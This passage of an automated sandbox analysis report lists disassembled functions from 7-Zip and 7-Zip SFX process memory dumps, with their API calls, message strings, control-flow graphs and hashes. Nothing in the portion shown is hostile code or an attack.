                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE086721063216FD7119BB5BC88C8B7FADEFC5A26700447AF64592321C7729C20DA72
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000010), ref: 0040842C
                                                                                                                                                                                                                                            • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000011), ref: 0040843A
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00405364
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041B828,?), ref: 004053A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • %X - %03X - %03X - %03X - %03X, xrefs: 0040535E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MetricsSystem$??3@wsprintf
                                                                                                                                                                                                                                          • String ID: %X - %03X - %03X - %03X - %03X
                                                                                                                                                                                                                                          • API String ID: 1174869416-1993364030
                                                                                                                                                                                                                                          • Opcode ID: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                                                                                                                                                                                          • Instruction ID: 65adf6dcda70838bb3b21e6056e5f535fe41afcbb6b0b1b43c55218142ba6697
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D117231A40218AADB51FB95ED46FDD7338FF14B08F50417AB911361D2DFB86A45CB88
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@wsprintf
                                                                                                                                                                                                                                          • String ID: (%d%s)
                                                                                                                                                                                                                                          • API String ID: 3815514257-2087557067
                                                                                                                                                                                                                                          • Opcode ID: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                                                                                                                                                                                          • Instruction ID: b8a3091fb0a8786d5856ec0415992ba747c3c410e3350e73f686e4d9c7ab3f81
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F06271900218ABCB21B756DD06ECA777CAF00304F1041BBA552B15E2DA75AA54CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: TextWindow$Length
                                                                                                                                                                                                                                          • String ID: j4@
                                                                                                                                                                                                                                          • API String ID: 1006428111-2012685699
                                                                                                                                                                                                                                          • Opcode ID: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                                                                                                                                                                                          • Instruction ID: 3817dcc93708ae326cc9214659a9c4e7fc7be87bb8e982cfdb796d017d3acd91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E09239200212AFC2229F19D84486FBBFAEFC4310B00847AF841D33E1CB39DC118B95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 0040475C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                                                                                                                          • API String ID: 2030045667-3806377612
                                                                                                                                                                                                                                          • Opcode ID: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                                                                                                                                                                                          • Instruction ID: eff6b3f0ce1e45bdfd51bc9acb40b22f926f37b9a8d4657fa527a9dafaf84f3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB012703C130022E21113200C07FC416408B08F13F10C552B108A80D3CBD900D0205D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                                                                                          • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                                                                                          • API String ID: 3442115484-272389550
                                                                                                                                                                                                                                          • Opcode ID: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
                                                                                                                                                                                                                                          • Instruction ID: 4136ddd66a581999823f491612244ff04d964db046dec0059302a74631eb8233
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D872C276204A81C6DB36EF25E8907AE7365F789B82F408126DE8A47778DF3CC559CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3352498445-0
                                                                                                                                                                                                                                          • Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                                                          • Instruction ID: 54e4bc12c39aba5360e07546d68f2cca1c938e25aacac2e28ac3013f2923e91b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 438263322186C096CB36DF25E4913AFB364F78AB90F454126EB8D5BB59DF78C985CB00

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1635 3347ac-33485c call 313314 * 2 1640 33489a-33491b call 336344 call 3132bc call 313b5c free * 2 call 313208 call 313314 1635->1640 1641 33485e-334884 call 312880 1635->1641 1656 334921-334925 1640->1656 1657 3349bd-3349cb call 31477c 1640->1657 1641->1640 1647 334886-334895 call 313404 1641->1647 1647->1640 1656->1657 1659 33492b-33495e call 313208 call 31449c 1656->1659 1662 3349d1-3349e7 1657->1662 1663 334dff 1657->1663 1672 3349b0-3349b8 free 1659->1672 1673 334960-33496f 1659->1673 1676 3349e9-334a28 free * 4 1662->1676 1677 334a68-334ad2 call 313208 * 3 1662->1677 1665 334e02-334e05 1663->1665 1669 334e40-334e45 1665->1669 1670 334e07-334e1c call 312130 1665->1670 1674 334e47-334e58 call 313518 1669->1674 1675 334e5d-334e62 call 3170c8 1669->1675 1687 334e30 1670->1687 1688 334e1e-334e2e call 313314 1670->1688 1672->1657 1681 334971-334978 1673->1681 1682 33497a-33498b 1673->1682 1701 334f2c-334f98 call 323f0c 1674->1701 1693 334e67-334e6a 1675->1693 1678 334a2a 1676->1678 1679 334a58-334a63 free 1676->1679 1720 334d30-334d3b 1677->1720 1721 334ad8-334adb 1677->1721 1686 334a2e-334a41 1678->1686 1690 33504a-335059 free 1679->1690 1681->1682 1689 334993-334996 1681->1689 1682->1689 1694 334a43-334a4f free * 2 1686->1694 1695 334a54-334a56 1686->1695 1698 334e33-334e3b call 31b8f0 1687->1698 1688->1698 1689->1672 1697 334998-3349ad call 313404 1689->1697 1699 33523b-33524e 1690->1699 1693->1701 1702 334e70-334eea GetLastError call 313518 call 31362c free * 4 1693->1702 1694->1695 1695->1679 1695->1686 1697->1672 1698->1669 1715 33505e-335062 1701->1715 1716 334f9e-334fa2 1701->1716 1723 334f1a-334f27 free 1702->1723 1724 334eec 1702->1724 1718 335064-33506c 1715->1718 1719 33506e 1715->1719 1716->1715 1722 334fa8-334fac 1716->1722 1718->1719 1725 335071-33507d 1718->1725 1719->1725 1728 334d41-334dae call 322a84 free * 4 1720->1728 1729 334df0-334dfd call 322a84 1720->1729 1726 334b24-334b3e call 33ec5c 1721->1726 1727 334add-334ae0 1721->1727 1722->1715 1730 334fb2-334fc7 call 3232e8 1722->1730 1723->1690 1731 334ef0-334f03 1724->1731 1734 335083-3350d1 1725->1734 1735 335152-33516d 1725->1735 1749 334b44 1726->1749 1750 334c9d-334cee call 322a84 free * 4 1726->1750 1727->1726 1736 334ae2-334aee 1727->1736 1793 334db0 1728->1793 1794 334dde-334deb free 1728->1794 1729->1665 1730->1715 1748 334fcd-33500d free * 4 1730->1748 1740 334f15-334f18 1731->1740 1741 334f05-334f10 free * 2 1731->1741 1774 335143-335150 call 31ae2c 1734->1774 1775 3350d3-3350de 1734->1775 1746 335173 1735->1746 1744 334af0-334af7 1736->1744 1745 334b4c-334b50 1736->1745 1740->1723 1740->1731 1741->1740 1744->1745 1747 334af9-334b14 call 33b290 1744->1747 1751 334b52-334b5a 1745->1751 1752 334b60-334b63 1745->1752 1754 335175-33517b 1746->1754 1777 334c0a-334c5b call 322a84 free * 4 1747->1777 1778 334b1a-334b22 1747->1778 1757 33500f 1748->1757 1758 33503d-335048 free 1748->1758 1749->1745 1783 334cf0 1750->1783 1784 334d1e-334d2b free 1750->1784 1751->1752 1760 334bf5-334bff 1751->1760 1761 334bc1-334bc4 1752->1761 1762 334b65-334b80 call 314318 1752->1762 1764 335190-33519e call 351850 1754->1764 1765 33517d-335188 call 326cd0 1754->1765 1768 335013-335026 1757->1768 1758->1690 1760->1721 1772 334c05 1760->1772 1769 334be3-334bf2 call 35c7d4 1761->1769 1770 334bc6-334be1 call 3243fc 1761->1770 1790 334b82-334b85 1762->1790 1791 334b87-334b9e 1762->1791 1788 3351a1-3351a6 1764->1788 1765->1764 1780 335038-33503b 1768->1780 1781 335028-335033 free * 2 1768->1781 1769->1760 1770->1760 1770->1769 1772->1720 1774->1754 1775->1774 1792 3350e0-3350e3 1775->1792 1810 334c8b-334c98 free 1777->1810 1811 334c5d 1777->1811 1778->1745 1780->1758 1780->1768 1781->1780 1789 334cf4-334d07 1783->1789 1784->1690 1804 3351b1-3351f1 free * 4 1788->1804 1805 3351a8-3351b0 call 326cd0 1788->1805 1806 334d19-334d1c 1789->1806 1807 334d09-334d14 free * 2 1789->1807 1790->1761 1799 334ba0-334ba8 1791->1799 1800 334baf-334bb3 1791->1800 1801 3350e5-3350e7 1792->1801 1802 335138-335140 1792->1802 1803 334db4-334dc7 1793->1803 1794->1690 1799->1761 1815 334baa-334bad 1799->1815 1800->1761 1816 334bb5-334bbd 1800->1816 1817 33512b-335136 1801->1817 1818 3350e9-3350eb 1801->1818 1802->1774 1819 334dd9-334ddc 1803->1819 1820 334dc9-334dd4 free * 2 1803->1820 1813 3351f3 1804->1813 1814 335221-335239 free * 2 1804->1814 1805->1804 1806->1784 1806->1789 1807->1806 1810->1690 1821 334c61-334c74 1811->1821 1825 3351f7-33520a 1813->1825 1814->1699 1815->1761 1816->1761 1817->1774 1822 33511f-335129 1818->1822 1823 3350ed-3350f0 1818->1823 1819->1794 1819->1803 1820->1819 1826 334c86-334c89 1821->1826 1827 334c76-334c81 free * 2 1821->1827 1822->1774 1830 335112-33511d 1823->1830 1831 3350f2-335111 _CxxThrowException 1823->1831 1828 33521c-33521f 1825->1828 1829 33520c-335217 free * 2 1825->1829 1826->1810 1826->1821 1827->1826 1828->1814 1828->1825 1829->1828 1830->1774 1831->1830
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Can not create output directory: , xrefs: 00334E83
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                                                                                          • String ID: Can not create output directory:
                                                                                                                                                                                                                                          • API String ID: 4159955631-3123869724
                                                                                                                                                                                                                                          • Opcode ID: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
                                                                                                                                                                                                                                          • Instruction ID: 43c94ad0b8cc35c30d9edb72a450404bb3aca34ad018a3f5bc5915829216161e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90426032219AC096CA36EF25E4903EFA361F7CA780F555222DB8D57B19DF38C995CB00

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2037 335458-3354e2 2038 3354f2-3354f6 2037->2038 2039 3354e4-3354f0 2037->2039 2040 3354fe-335504 2038->2040 2039->2040 2041 33550a 2040->2041 2042 3355ec-3355fd 2040->2042 2043 33550d-335538 call 317d28 call 313208 2041->2043 2044 335612-335615 2042->2044 2045 3355ff-33560a call 312130 2042->2045 2058 33553a-33554c call 317ebc 2043->2058 2059 33556c-33559c call 31b8f0 free 2043->2059 2047 335617-33561f memset 2044->2047 2048 335624-335639 call 312130 2044->2048 2045->2044 2047->2048 2056 33563b-33563e call 323524 2048->2056 2057 335648 2048->2057 2064 335643-335646 2056->2064 2061 33564b-335656 2057->2061 2068 335551-335554 2058->2068 2059->2043 2073 3355a2 2059->2073 2065 335662-3356d1 call 3343b0 2061->2065 2066 335658-335661 2061->2066 2064->2061 2075 3356d3-3356e3 2065->2075 2076 3356fd-335715 2065->2076 2066->2065 2071 335556-335562 2068->2071 2072 3355a4-3355c7 _CxxThrowException 2068->2072 2077 335564 2071->2077 2078 3355c8-3355eb _CxxThrowException 2071->2078 2072->2078 2073->2042 2075->2076 2086 3356e5-3356f8 free 2075->2086 2079 33571b-33571e 2076->2079 2080 335f1d-335f22 2076->2080 2077->2059 2078->2042 2084 335726-33572a 2079->2084 2081 335f24-335f27 2080->2081 2082 335f29-335f3d 2080->2082 2081->2082 2085 335f8d-336002 free * 2 2081->2085 2093 335f54-335f67 2082->2093 2094 335f3f-335f52 free 2082->2094 2087 335730-33575f call 317d28 call 313208 2084->2087 2088 335c37-335c50 2084->2088 2097 336004-336017 2085->2097 2098 335f7c-335f8b free 2086->2098 2103 335772-33577e call 317ebc 2087->2103 2104 335761-335770 2087->2104 2088->2084 2089 335c56-335c5a 2088->2089 2089->2080 2093->2085 2105 335f69-335f7b free 2093->2105 2094->2098 2098->2097 2108 335783-335786 2103->2108 2106 33579e-3357b4 call 351544 2104->2106 2105->2098 2113 3357ba-33586c call 334504 call 3342a8 call 3340c4 call 313404 call 344c00 2106->2113 2114 335c5f-335c80 free * 2 2106->2114 2110 335ef9-335f1c _CxxThrowException 2108->2110 2111 33578c-335798 2108->2111 2110->2080 2111->2106 2111->2110 2126 33586e-335876 2113->2126 2127 33587d-335883 2113->2127 2114->2098 2128 335889-3358b3 call 351bc0 2126->2128 2129 335878 2126->2129 2127->2128 2130 335c85-335c9e free 2127->2130 2136 335d02-335d1e free 2128->2136 2137 3358b9-3358bc 2128->2137 2129->2127 2131 335ca0 2130->2131 2132 335cbe-335cfd free call 334610 free * 2 2130->2132 2134 335ca4-335cbc free 2131->2134 2132->2098 2134->2132 2134->2134 2141 335d20 2136->2141 2142 335d3e-335d7b free call 334610 free * 2 2136->2142 2139 3358c2-3358d3 2137->2139 2140 3359b1-3359bd 2137->2140 2145 335933 2139->2145 2146 3358d5-335907 call 317d28 call 313208 call 317ebc 2139->2146 2147 3359c3-3359cd 2140->2147 2148 335a8e-335a93 2140->2148 2143 335d24-335d3c free 2141->2143 2142->2098 2143->2142 2143->2143 2151 335936-33594f free 2145->2151 2187 335924-335931 free 2146->2187 2188 335909-335915 2146->2188 2154 3359d3-3359e1 2147->2154 2155 335a95-335a9a 2147->2155 2153 335aa1-335ab9 2148->2153 2158 335951 2151->2158 2159 33596f-3359ac free call 334610 free 2151->2159 2156 335abb-335ac3 2153->2156 2157 335acc 2153->2157 2161 3359e3-3359ed 2154->2161 2162 335a55-335a58 2154->2162 2155->2153 2156->2157 2164 335ac5-335aca 2156->2164 2165 335acf-335b54 call 3347ac 2157->2165 2167 335955-33596d free 2158->2167 2159->2088 2163 3359f5-335a11 call 334434 2161->2163 2168 335a5a-335a86 2162->2168 2169 335a9c 2162->2169 2181 335a13-335a15 2163->2181 2182 335a21-335a30 2163->2182 2164->2165 2183 335b5a-335b61 2165->2183 2184 335dfe-335e1a free 2165->2184 2167->2159 2167->2167 2185 335d80-335d9c free 2168->2185 2186 335a8c 2168->2186 2169->2153 2181->2182 2189 335a17-335a1d 2181->2189 2182->2163 2190 335a32-335a52 2182->2190 2191 335b63-335b7e 2183->2191 2192 335b80 2183->2192 2195 335e3a-335e77 free call 334610 free * 2 2184->2195 2196 335e1c 2184->2196 2193 335d9e 2185->2193 2194 335dbc-335df9 free call 334610 free * 2 2185->2194 2186->2153 2187->2151 2188->2187 2199 335917-33591f 2188->2199 2189->2182 2190->2162 2200 335b88-335bb6 2191->2200 2192->2200 2201 335da2-335dba free 2193->2201 2194->2098 2195->2098 2197 335e20-335e38 free 2196->2197 2197->2195 2197->2197 2199->2187 2204 335e7c-335e95 free 2200->2204 2205 335bbc-335bd6 free 2200->2205 2201->2194 2201->2201 2207 335e97 2204->2207 2208 335eb5-335ef4 free call 334610 free * 2 2204->2208 2209 335bd8-335bdc 2205->2209 2210 335bff-335c12 free call 334610 2205->2210 2212 335e9b-335eb3 free 2207->2212 2208->2098 2214 335bde-335bf5 free 2209->2214 2217 335c17-335c35 free 2210->2217 2212->2208 2212->2212 2214->2214 2219 335bf7 2214->2219 2217->2088 2219->2210
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrow$memset
                                                                                                                                                                                                                                          • String ID: can't decompress folder$there is no such archive
                                                                                                                                                                                                                                          • API String ID: 4182836161-2069749860
                                                                                                                                                                                                                                          • Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                                                          • Instruction ID: fef54b3357312880f96a59c38f69570c5a6be53a5566ad8f5c035858ab2d73f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05525D32209AC096CA25DF25E4843EFB764F78AB94F455222DF9E57B25DF38C895CB00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
                                                                                                                                                                                                                                          • Instruction ID: b427b5c6f5a52555d87667ce5fce790d8576b1eb545b8cb7aedde1026981e265
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C742843B609AC08ACB26EF25D0906AF7765F7CAB88F561121EB5E4BB15CF38C495C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • I won't write compressed data to a terminal, xrefs: 00321741
                                                                                                                                                                                                                                          • stdout mode and email mode cannot be combined, xrefs: 00321710
                                                                                                                                                                                                                                          • -ai switch is not supported for this command, xrefs: 003215C3
                                                                                                                                                                                                                                          • Archive name cannot by empty, xrefs: 00321151
                                                                                                                                                                                                                                          • I won't write data and program's messages to same stream, xrefs: 003214B3, 00321782
                                                                                                                                                                                                                                          • Unsupported -spf:, xrefs: 00320F7E
                                                                                                                                                                                                                                          • Incorrect Number of benmchmark iterations, xrefs: 00321847
                                                                                                                                                                                                                                          • Only one archive can be created with rename command, xrefs: 003217E1
                                                                                                                                                                                                                                          • The command must be specified, xrefs: 00320DF5
                                                                                                                                                                                                                                          • Unsupported command:, xrefs: 00320E57
                                                                                                                                                                                                                                          • Cannot use absolute pathnames for this command, xrefs: 0032138C
                                                                                                                                                                                                                                          • Cannot find archive name, xrefs: 0032110A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrow$free$wcscmp
